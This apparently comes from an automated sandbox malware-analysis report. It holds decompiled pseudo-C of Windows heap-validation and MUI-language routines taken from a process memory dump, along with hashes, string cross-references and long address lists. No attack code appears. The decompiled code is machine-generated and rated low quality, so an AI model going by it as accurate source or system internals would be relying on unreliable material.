							L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L009E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00A0F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00A11370(_t280, 0x9a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00A0BB40(_t267,  &_v68, _t245);
							if(L009D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00A11370(_t284, 0x9a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00A0BB40(_t267,  &_v68, _t224);
						if(L009D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                          0x009d3d3c
                                                                                                                          0x009d3d42
                                                                                                                          0x009d3d44
                                                                                                                          0x009d3d46
                                                                                                                          0x009d3d49
                                                                                                                          0x009d3d4c
                                                                                                                          0x009d3d4f
                                                                                                                          0x009d3d52
                                                                                                                          0x009d3d55
                                                                                                                          0x009d3d58
                                                                                                                          0x009d3d5b
                                                                                                                          0x009d3d5f
                                                                                                                          0x009d3d61
                                                                                                                          0x009d3d66
                                                                                                                          0x00a28213
                                                                                                                          0x00a28218
                                                                                                                          0x009d4085
                                                                                                                          0x009d4088
                                                                                                                          0x009d408e
                                                                                                                          0x009d4094
                                                                                                                          0x009d409a
                                                                                                                          0x009d40a0
                                                                                                                          0x009d40a6
                                                                                                                          0x009d40a9
                                                                                                                          0x009d40af
                                                                                                                          0x009d40b6
                                                                                                                          0x009d40bd
                                                                                                                          0x009d40bd
                                                                                                                          0x009d3d83
                                                                                                                          0x00a2821f
                                                                                                                          0x00a28229
                                                                                                                          0x00a28238
                                                                                                                          0x00a28238
                                                                                                                          0x00a2823d
                                                                                                                          0x00a2823d
                                                                                                                          0x009d3da0
                                                                                                                          0x009d3daf
                                                                                                                          0x009d3db5
                                                                                                                          0x009d3dba
                                                                                                                          0x009d3dba
                                                                                                                          0x009d3dd4
                                                                                                                          0x009d3e94
                                                                                                                          0x009d3eab
                                                                                                                          0x009d3f6d
                                                                                                                          0x009d3f84
                                                                                                                          0x009d406b
                                                                                                                          0x009d406b
                                                                                                                          0x009d406e
                                                                                                                          0x009d406e
                                                                                                                          0x009d4070
                                                                                                                          0x009d4074
                                                                                                                          0x00a28351
                                                                                                                          0x00a28351
                                                                                                                          0x009d407a
                                                                                                                          0x009d407f
                                                                                                                          0x00a2835d
                                                                                                                          0x00a28370
                                                                                                                          0x00a28377
                                                                                                                          0x00a28379
                                                                                                                          0x00a2837c
                                                                                                                          0x00a2837c
                                                                                                                          0x00a2835d
                                                                                                                          0x00000000
                                                                                                                          0x009d407f
                                                                                                                          0x009d3f8a
                                                                                                                          0x009d3f8d
                                                                                                                          0x009d3f90
                                                                                                                          0x009d3f95
                                                                                                                          0x00a2830d
                                                                                                                          0x00a2830f
                                                                                                                          0x009d3f9b
                                                                                                                          0x009d3fac
                                                                                                                          0x009d3fae
                                                                                                                          0x009d3fb1
                                                                                                                          0x009d3fb1
                                                                                                                          0x009d3fb6
                                                                                                                          0x00a28317
                                                                                                                          0x00a2831a
                                                                                                                          0x00000000
                                                                                                                          0x009d3fbc
                                                                                                                          0x009d3fc1
                                                                                                                          0x009d3fc9
                                                                                                                          0x009d3fd7
                                                                                                                          0x009d3fda
                                                                                                                          0x009d3fdd
                                                                                                                          0x009d4021
                                                                                                                          0x009d4021
                                                                                                                          0x009d4029
                                                                                                                          0x009d4030
                                                                                                                          0x009d4044
                                                                                                                          0x009d4046
                                                                                                                          0x009d4046
                                                                                                                          0x009d4044
                                                                                                                          0x009d4049
                                                                                                                          0x00a28327
                                                                                                                          0x00a28334
                                                                                                                          0x00a28339
                                                                                                                          0x00a2833c
                                                                                                                          0x009d404f
                                                                                                                          0x009d404f
                                                                                                                          0x009d404f
                                                                                                                          0x009d4051
                                                                                                                          0x009d4056
                                                                                                                          0x009d4063
                                                                                                                          0x009d4063
                                                                                                                          0x009d4068
                                                                                                                          0x00000000
                                                                                                                          0x009d4068
                                                                                                                          0x009d3fdf
                                                                                                                          0x009d3fe2
                                                                                                                          0x009d3fe4
                                                                                                                          0x009d3fe7
                                                                                                                          0x009d3fef
                                                                                                                          0x009d4003
                                                                                                                          0x009d4005
                                                                                                                          0x009d4005
                                                                                                                          0x009d400c
                                                                                                                          0x009d4013
                                                                                                                          0x009d4016
                                                                                                                          0x009d4017
                                                                                                                          0x009d401b
                                                                                                                          0x009d401e
                                                                                                                          0x00000000
                                                                                                                          0x009d401e
                                                                                                                          0x009d3fb6
                                                                                                                          0x009d3eb1
                                                                                                                          0x009d3eb4
                                                                                                                          0x009d3eb7
                                                                                                                          0x009d3ebc
                                                                                                                          0x00a282a9
                                                                                                                          0x00a282ab
                                                                                                                          0x009d3ec2
                                                                                                                          0x009d3ed3
                                                                                                                          0x009d3ed5
                                                                                                                          0x009d3ed8
                                                                                                                          0x009d3ed8
                                                                                                                          0x009d3edd
                                                                                                                          0x00a282b3
                                                                                                                          0x00a282b6
                                                                                                                          0x00000000
                                                                                                                          0x009d3ee3
                                                                                                                          0x009d3ee8
                                                                                                                          0x009d3eed
                                                                                                                          0x009d3ef0
                                                                                                                          0x009d3ef3
                                                                                                                          0x009d3f02
                                                                                                                          0x009d3f05
                                                                                                                          0x009d3f08
                                                                                                                          0x00a282c0
                                                                                                                          0x00a282c3
                                                                                                                          0x00a282c5
                                                                                                                          0x00a282c8
                                                                                                                          0x00a282d0
                                                                                                                          0x00a282e4
                                                                                                                          0x00a282e6
                                                                                                                          0x00a282e6
                                                                                                                          0x00a282ed
                                                                                                                          0x00a282f4
                                                                                                                          0x00a282f7
                                                                                                                          0x00a282f8
                                                                                                                          0x00a282fc
                                                                                                                          0x00a282ff
                                                                                                                          0x00a282ff
                                                                                                                          0x009d3f0e
                                                                                                                          0x009d3f11
                                                                                                                          0x009d3f16
                                                                                                                          0x009d3f1d
                                                                                                                          0x009d3f31
                                                                                                                          0x00a28307
                                                                                                                          0x00a28307
                                                                                                                          0x009d3f31
                                                                                                                          0x009d3f39
                                                                                                                          0x009d3f48
                                                                                                                          0x009d3f4d
                                                                                                                          0x009d3f50
                                                                                                                          0x009d3f50
                                                                                                                          0x009d3f53
                                                                                                                          0x009d3f58
                                                                                                                          0x009d3f65
                                                                                                                          0x009d3f65
                                                                                                                          0x009d3f6a
                                                                                                                          0x00000000
                                                                                                                          0x009d3f6a
                                                                                                                          0x009d3edd
                                                                                                                          0x009d3dda
                                                                                                                          0x009d3ddd
                                                                                                                          0x009d3de0
                                                                                                                          0x009d3de5
                                                                                                                          0x00a28245
                                                                                                                          0x009d3deb
                                                                                                                          0x009d3df7
                                                                                                                          0x009d3dfc
                                                                                                                          0x009d3dfe
                                                                                                                          0x009d3e01
                                                                                                                          0x009d3e01
                                                                                                                          0x009d3e06
                                                                                                                          0x00a2824d
                                                                                                                          0x00a2824f
                                                                                                                          0x00a28254
                                                                                                                          0x00000000
                                                                                                                          0x009d3e0c
                                                                                                                          0x009d3e11
                                                                                                                          0x009d3e16
                                                                                                                          0x009d3e19
                                                                                                                          0x009d3e29
                                                                                                                          0x009d3e2c
                                                                                                                          0x009d3e2f
                                                                                                                          0x00a2825c
                                                                                                                          0x00a2825f
                                                                                                                          0x00a28261
                                                                                                                          0x00a28264
                                                                                                                          0x00a2826c
                                                                                                                          0x00a28280
                                                                                                                          0x00a28282
                                                                                                                          0x00a28282
                                                                                                                          0x00a28289
                                                                                                                          0x00a28290
                                                                                                                          0x00a28293
                                                                                                                          0x00a28294
                                                                                                                          0x00a28298
                                                                                                                          0x00a2829b
                                                                                                                          0x00a2829b
                                                                                                                          0x009d3e35
                                                                                                                          0x009d3e38
                                                                                                                          0x009d3e3d
                                                                                                                          0x009d3e44
                                                                                                                          0x009d3e58
                                                                                                                          0x00a282a3
                                                                                                                          0x00a282a3
                                                                                                                          0x009d3e58
                                                                                                                          0x009d3e60
                                                                                                                          0x009d3e6f
                                                                                                                          0x009d3e74
                                                                                                                          0x009d3e77
                                                                                                                          0x009d3e77
                                                                                                                          0x009d3e7a
                                                                                                                          0x009d3e7f
                                                                                                                          0x009d3e8c
                                                                                                                          0x009d3e8c
                                                                                                                          0x009d3e91
                                                                                                                          0x00000000
                                                                                                                          0x009d3e91

                                                                                                                          Strings
                                                                                                                          • WindowsExcludedProcs, xrefs: 009D3D6F
                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 009D3D8C
                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 009D3F70
                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 009D3DC0
                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 009D3E97
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                          • API String ID: 0-258546922
                                                                                                                          • Opcode ID: f0197bb7a1460aca753b0bb4524f06f74a54175acd24a476d5921b3245cd0a33
                                                                                                                          • Instruction ID: 00a05221b860dd53ea93763aeb078f4e9986f6fab8d7f4603dae8e04a5911f9e
                                                                                                                          • Opcode Fuzzy Hash: f0197bb7a1460aca753b0bb4524f06f74a54175acd24a476d5921b3245cd0a33
                                                                                                                          • Instruction Fuzzy Hash: D9F14A72D41228EFCB15DF98D980AEEBBB9FF48750F14846AF905A7251D7749E00CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009C40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 29%
                                                                                                                          			E009C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E009CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E009CB150(", passed to %s", _t29);
					}
					_push("\n");
					E009CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xab6378 = 1;
						asm("int3");
						 *0xab6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                          0x009c40e6
                                                                                                                          0x009c40e8
                                                                                                                          0x009c40f1
                                                                                                                          0x00a2042d
                                                                                                                          0x00a2044c
                                                                                                                          0x00a20451
                                                                                                                          0x00a2042f
                                                                                                                          0x00a20444
                                                                                                                          0x00a20449
                                                                                                                          0x00a2045d
                                                                                                                          0x00a20466
                                                                                                                          0x00a2046e
                                                                                                                          0x00a20474
                                                                                                                          0x00a20475
                                                                                                                          0x00a2047a
                                                                                                                          0x00a2048a
                                                                                                                          0x00a2048c
                                                                                                                          0x00a20493
                                                                                                                          0x00a20494
                                                                                                                          0x00a20494
                                                                                                                          0x00000000
                                                                                                                          0x00a2049b
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                          • API String ID: 0-188067316
                                                                                                                          • Opcode ID: d7419a8f586a7bd8b2167a6e724f5880a99bfabc142d29078c8fd40422471ef7
                                                                                                                          • Instruction ID: 383352fa4e588c9e3d34484868759c9ba94172df09b2a70c4473892b5aa5cf09
                                                                                                                          • Opcode Fuzzy Hash: d7419a8f586a7bd8b2167a6e724f5880a99bfabc142d29078c8fd40422471ef7
                                                                                                                          • Instruction Fuzzy Hash: 4701F0325085509ED315A76CF45FF9177A8DB81B34F1DC07DF106576D3CBA45844C261
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 70%
                                                                                                                          			E009EA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xab8748 - 1;
					if( *0xab8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
									_t260 = _t257 + 4;
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E009CB150();
								_t257 = _t260 + 4;
								__eflags =  *0xab7bc8;
								if(__eflags == 0) {
									E00A82073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00A8A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E00A1D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E009EAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00A8A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00A8A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xab8748 - 1;
					if( *0xab8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E009CB150();
							} else {
								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E009CB150();
							__eflags =  *0xab7bc8;
							if(__eflags == 0) {
								_t131 = E00A82073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                                                          0x009ea83a
                                                                                                                          0x009ea83c
                                                                                                                          0x009ea83e
                                                                                                                          0x009ea841
                                                                                                                          0x009ea844
                                                                                                                          0x009ea84a
                                                                                                                          0x009eaa53
                                                                                                                          0x009eaa59
                                                                                                                          0x009eaa59
                                                                                                                          0x009ea858
                                                                                                                          0x009ea85e
                                                                                                                          0x009eaaf5
                                                                                                                          0x009eaafc
                                                                                                                          0x00a3229e
                                                                                                                          0x00a322a2
                                                                                                                          0x00a322a8
                                                                                                                          0x00a322b3
                                                                                                                          0x00a322b5
                                                                                                                          0x00a322bb
                                                                                                                          0x00a322c1
                                                                                                                          0x00a322c5
                                                                                                                          0x00a322e6
                                                                                                                          0x00a322eb
                                                                                                                          0x00a322f0
                                                                                                                          0x00a322c7
                                                                                                                          0x00a322dc
                                                                                                                          0x00a322e1
                                                                                                                          0x00a322e1
                                                                                                                          0x00a322f3
                                                                                                                          0x00a322f8
                                                                                                                          0x00a322fd
                                                                                                                          0x00a32300
                                                                                                                          0x00a32307
                                                                                                                          0x00a3230e
                                                                                                                          0x00a3230e
                                                                                                                          0x00a32313
                                                                                                                          0x00a32313
                                                                                                                          0x00a322b5
                                                                                                                          0x00a322a2
                                                                                                                          0x009eaafc
                                                                                                                          0x009ea864
                                                                                                                          0x009ea869
                                                                                                                          0x009eaa5c
                                                                                                                          0x009eaa5e
                                                                                                                          0x009ea86f
                                                                                                                          0x009ea87f
                                                                                                                          0x009ea885
                                                                                                                          0x009ea885
                                                                                                                          0x009ea88b
                                                                                                                          0x009ea890
                                                                                                                          0x009ea896
                                                                                                                          0x009eab0c
                                                                                                                          0x009eab0f
                                                                                                                          0x009eab15
                                                                                                                          0x00a32320
                                                                                                                          0x00a32320
                                                                                                                          0x009eab1b
                                                                                                                          0x009ea89c
                                                                                                                          0x009ea89f
                                                                                                                          0x009ea8a2
                                                                                                                          0x009ea8a2
                                                                                                                          0x009ea8a5
                                                                                                                          0x009ea8af
                                                                                                                          0x009ea8b3
                                                                                                                          0x009ea8b8
                                                                                                                          0x009eaa66
                                                                                                                          0x009ea8be
                                                                                                                          0x009ea8c5
                                                                                                                          0x009ea8c6
                                                                                                                          0x009ea8ce
                                                                                                                          0x00a32328
                                                                                                                          0x00a32332
                                                                                                                          0x00a32337
                                                                                                                          0x00a32337
                                                                                                                          0x009ea8ce
                                                                                                                          0x009ea8d4
                                                                                                                          0x009ea8d8
                                                                                                                          0x009ea8db
                                                                                                                          0x009ea8de
                                                                                                                          0x009ea8e1
                                                                                                                          0x009ea8e5
                                                                                                                          0x009ea8e8
                                                                                                                          0x009ea8f0
                                                                                                                          0x009ea8f3
                                                                                                                          0x00a3234c
                                                                                                                          0x00a32350
                                                                                                                          0x00a32355
                                                                                                                          0x00a32359
                                                                                                                          0x00a32359
                                                                                                                          0x009ea8f9
                                                                                                                          0x009ea901
                                                                                                                          0x009eaae4
                                                                                                                          0x009eaae4
                                                                                                                          0x009eaaea
                                                                                                                          0x00000000
                                                                                                                          0x009ea907
                                                                                                                          0x009ea90a
                                                                                                                          0x009ea91d
                                                                                                                          0x009ea91d
                                                                                                                          0x00000000
                                                                                                                          0x009ea910
                                                                                                                          0x009ea910
                                                                                                                          0x009ea910
                                                                                                                          0x009ea914
                                                                                                                          0x009ea924
                                                                                                                          0x009ea924
                                                                                                                          0x009ea924
                                                                                                                          0x009ea924
                                                                                                                          0x009ea916
                                                                                                                          0x009ea91b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea91b
                                                                                                                          0x009ea925
                                                                                                                          0x009ea925
                                                                                                                          0x009ea932
                                                                                                                          0x009ea936
                                                                                                                          0x009ea93c
                                                                                                                          0x009ea93c
                                                                                                                          0x009ea93c
                                                                                                                          0x009eab22
                                                                                                                          0x009eab24
                                                                                                                          0x009eab27
                                                                                                                          0x009eab27
                                                                                                                          0x009ea942
                                                                                                                          0x009ea944
                                                                                                                          0x009eaaba
                                                                                                                          0x009eaabd
                                                                                                                          0x009eaac0
                                                                                                                          0x009eaac0
                                                                                                                          0x009eaac2
                                                                                                                          0x009eab2f
                                                                                                                          0x009eaac4
                                                                                                                          0x009eaac4
                                                                                                                          0x009eaac7
                                                                                                                          0x009eaaca
                                                                                                                          0x009eaacc
                                                                                                                          0x009eaace
                                                                                                                          0x009eaace
                                                                                                                          0x009eaace
                                                                                                                          0x009eaad1
                                                                                                                          0x009eaad1
                                                                                                                          0x009eaad7
                                                                                                                          0x009eaad9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32361
                                                                                                                          0x00a32369
                                                                                                                          0x00a3236b
                                                                                                                          0x00000000
                                                                                                                          0x00a32371
                                                                                                                          0x00000000
                                                                                                                          0x00a32371
                                                                                                                          0x00000000
                                                                                                                          0x00a3236b
                                                                                                                          0x009eaac0
                                                                                                                          0x009ea94a
                                                                                                                          0x009ea94a
                                                                                                                          0x009ea94d
                                                                                                                          0x009ea94d
                                                                                                                          0x009ea950
                                                                                                                          0x009ea954
                                                                                                                          0x00a32376
                                                                                                                          0x00a32380
                                                                                                                          0x009ea95a
                                                                                                                          0x009ea95a
                                                                                                                          0x009ea95c
                                                                                                                          0x009ea95f
                                                                                                                          0x009ea961
                                                                                                                          0x009ea961
                                                                                                                          0x009ea967
                                                                                                                          0x009ea96a
                                                                                                                          0x009ea972
                                                                                                                          0x009eaa02
                                                                                                                          0x009eaa06
                                                                                                                          0x009eaa10
                                                                                                                          0x009eaa16
                                                                                                                          0x009eaa16
                                                                                                                          0x009eaa1b
                                                                                                                          0x009eaa21
                                                                                                                          0x009eaa24
                                                                                                                          0x009eaa27
                                                                                                                          0x009eaa29
                                                                                                                          0x009eaa2c
                                                                                                                          0x009eaa32
                                                                                                                          0x00000000
